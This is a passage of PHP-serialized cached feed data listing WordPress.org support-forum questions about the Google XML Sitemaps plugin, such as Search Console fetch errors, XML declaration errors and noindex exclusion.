Sitemaps sitemap-pt-page-\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/support/topic/bug-google-xml-sitemaps-sitemap-pt-page/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Oct 2019 08:18:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:206:\"\n						\n						<p>Replies: 1</p>\n						<p>Google ignores these sitemap-pt-post-2019.xml on the sitemap. Why?<br />\nerror &#8220;Couldn&#8217;t fetch&#8221;  why not register these extensions</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"cmsnegar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/sitemap-xml-google-search-console-error-couldnt-fetch/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"sitemap.xml Google Search console error &amp;#8220;couldnt fetch&amp;#8221;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/sitemap-xml-google-search-console-error-couldnt-fetch/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Oct 2019 20:05:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:777:\"\n						\n						<p>Replies: 2</p>\n						<p>When I installed the XML Sitemap Generator plugin and clicked on the &#8220;Notify Search Engines&#8221; link it seemed to work and now after a couple of weeks the plugin says &#8220;Google was successfully notified about changes.&#8221; but when I check the Google Search Console under Sitemaps it shows sitemap.xml with the status message &#8220;Couldn&#8217;t fetch&#8221;. </p>\n<p>If I check the file structure for the website I don&#8217;t see any file named &#8220;sitemap.xml&#8221; at the root of the domain where the WordPress files are. Does the plugin actually create a physical file named &#8220;sitemap.xml&#8221; at the root of the domain or is it hidden in some other folder?</p>\n<p>Thanks,<br />\nRichard</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"fimage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wordpress.org/support/topic/the-site-is-not-working-theres-only-one-page-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"The site is not working? There&amp;#8217;s only one page URL.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wordpress.org/support/topic/the-site-is-not-working-theres-only-one-page-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Sep 2019 17:27:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:191:\"\n						\n						<p>Replies: 0</p>\n						<p>Used the plug-in and create the sitemap. Why there&#8217;s only one url insite the sitemap.  I cannot figure out where it went wrong.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"lyqrain\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/504-error-when-notify-search-engines/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"504 Error when Notify Search Engines\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/504-error-when-notify-search-engines/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Sep 2019 06:43:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:306:\"\n						\n						<p>Replies: 3</p>\n						<p>Hi,<br />\nI got 504 Error giveway when I try to notify search engines about main sitemap and all sub-sitemaps. My website has manu posts (4200); so I tried to increase memory and time excution but no one help. Could you help me.<br />\nBest Regards.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"hassadr\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/html-option-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"HTML Option\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/html-option-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Sep 2019 14:07:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:191:\"\n						\n						<p>Replies: 0</p>\n						<p>If we check the create an html version, is that also available to display on a webpage of our site to a person browsing our website? </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Futuresweb\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/help-faq-info-missing-re-installation-in-subdirectory/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"Help &amp;amp; FAQ: info missing re installation in subdirectory\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/help-faq-info-missing-re-installation-in-subdirectory/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Sep 2019 15:06:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1354:\"\n						\n						<p>Replies: 1</p>\n						<p>It appears that your Help &amp; FAQ page has broken links. I cannot find the information on what to do when your WP install is in a subdirectory but your website appears in the root directory to the public. Are those links broken or am I just missing something?</p>\n<p>This link:<br />\n<a href=\"https://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/#P221_root\" rel=\"nofollow\">https://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/#P221_root</a></p>\n<p>and this link:<br />\n<a href=\"https://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/?utm_source=wp-wm&#038;utm_medium=install&#038;utm_content=help-options-adv#P221_root\" rel=\"nofollow\">https://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/?utm_source=wp-wm&#038;utm_medium=install&#038;utm_content=help-options-adv#P221_root</a></p>\n<p>go nowhere.</p>\n<p>I cannot find the instructions on how to deal with that situation; when&#8230;<br />\nWordPress Address (URL):<br />\n<a href=\"https://example.com/installdirectory\" rel=\"nofollow\">https://example.com/installdirectory</a></p>\n<p>Site Address (URL):<br />\n<a href=\"https://example.com\" rel=\"nofollow\">https://example.com</a></p>\n<p>Please help.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"hommealone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/support/topic/error-on-line-2-at-column-6-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"error on line 2 at column 6\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/support/topic/error-on-line-2-at-column-6-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Sep 2019 14:43:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:289:\"\n						\n						<p>Replies: 1</p>\n						<p>How do I resolve this error?</p>\n<p>This page contains the following errors:<br />\nerror on line 2 at column 6: XML declaration allowed only at the start of the document<br />\nBelow is a rendering of the page up to the first error.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"CamZL1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/support/topic/error-in-xml-at-line-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Error in xml at line 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/support/topic/error-in-xml-at-line-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Sep 2019 15:02:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1547:\"\n						\n						<p>Replies: 1</p>\n						<p>Hi,</p>\n<p>I just begin to run the plugin.</p>\n<ul>\n<li>Google answers that an error is into the xml file returned by the url<br />\n&lt;site&gt;/sitemap.xml/</li>\n<li>When executing the url from google-chrome you get the message :<br />\n<blockquote><p>This page contains the following errors:<br />\nerror on line 1 at column 38: XML declaration allowed only at the start of the document<br />\nBelow is a rendering of the page up to the first error.</p></blockquote>\n</li>\n</ul>\n<p>To find the problem (invalid content returned) the good way should to get the content returned by sitemap as text (not interpreted as xml content). I don&#8217;t see how to do it.</p>\n<p>Thanks for a quick answer, because the site cannot be referenced until this problem is solved.</p>\n<p>Note 1 : before I had a robots.txt for development which was locking any motor on any content for development, and the structure has been developed to hide many contents (which must remain anyway hidden) by the use of the categories.</p>\n<p>Note 2 : Probably a plugin (of my development) displays some contents (html comments of execution) which are merged before the xml content into sitemap xml output (I must clear or avoid this contents before the run of sitemaps). It seems that this can be the same problem as contents output by accident into ob before the header for ajax transactions. The solution could then be an ob clean into sitemap before the display of xml content to ob.</p>\n<p>Best regards</p>\n<p>Trebly</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Trebly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/support/topic/updating-php-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Updating php\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/support/topic/updating-php-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Sep 2019 17:23:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:383:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi, </p>\n<p>I need to update the php version of my account, but it looks like it will conflict with this plugin. Do you have any suggestions?</p>\n<p>Your version: Compatible up to: 5.2.3</p>\n<p>PHP newer version: <a href=\"https://wordpress.org/support/update-php/\" rel=\"nofollow\">https://wordpress.org/support/update-php/</a></p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"traffickitty\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/support/topic/sitemap-error-71/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"+++ sitemap error\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/support/topic/sitemap-error-71/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Sep 2019 08:25:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:407:\"\n						\n						<p>Replies: 2</p>\n						<p>Hello.</p>\n<p>Shows error when trying to enter <a href=\"https://rootraw.com/sitemap.xml\" rel=\"nofollow\">sitemap</a> url. </p>\n<p>&#8220;This page contains the following errors:<br />\nerror on line 2 at column 6: XML declaration allowed only at the start of the document<br />\nBelow is a rendering of the page up to the first error.&#8221;</p>\n<p>???</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Root Raw\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/support/topic/sitemap-not-working-17/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Sitemap Not Working\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/support/topic/sitemap-not-working-17/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Sep 2019 14:37:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:478:\"\n						\n						<p>Replies: 1</p>\n						<p>Hi,<br />\nMy sitemap is giving the following error: <a href=\"https://www.jobsfornationals.com/sitemap.xml\" rel=\"nofollow\">https://www.jobsfornationals.com/sitemap.xml</a></p>\n<p>This page contains the following errors:<br />\nerror on line 2 at column 6: XML declaration allowed only at the start of the document<br />\nBelow is a rendering of the page up to the first error.</p>\n<p>How and where do I resolve this error? </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"CamZL1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/support/topic/exclude-posts-marked-as-noindex/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Exclude posts marked as &amp;#8220;noindex&amp;#8221;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/support/topic/exclude-posts-marked-as-noindex/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Aug 2019 13:24:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:491:\"\n						\n						<p>Replies: 2</p>\n						<p>There&#8217;s some incompatibility with &#8220;Google Sitemap Generator&#8221; and &#8220;All in one SEO pack&#8221; plugins. If I mark a post as &#8220;Noindex&#8221; in SEO settings, it still shows up in the sitemap, which does not make sense and causes warnings by Google Search Console.<br />\nIs it possible to add some filter that will take into account the &#8220;Noindex&#8221; option and exclude such a post from the sitemap?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"AlexeyKosov\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				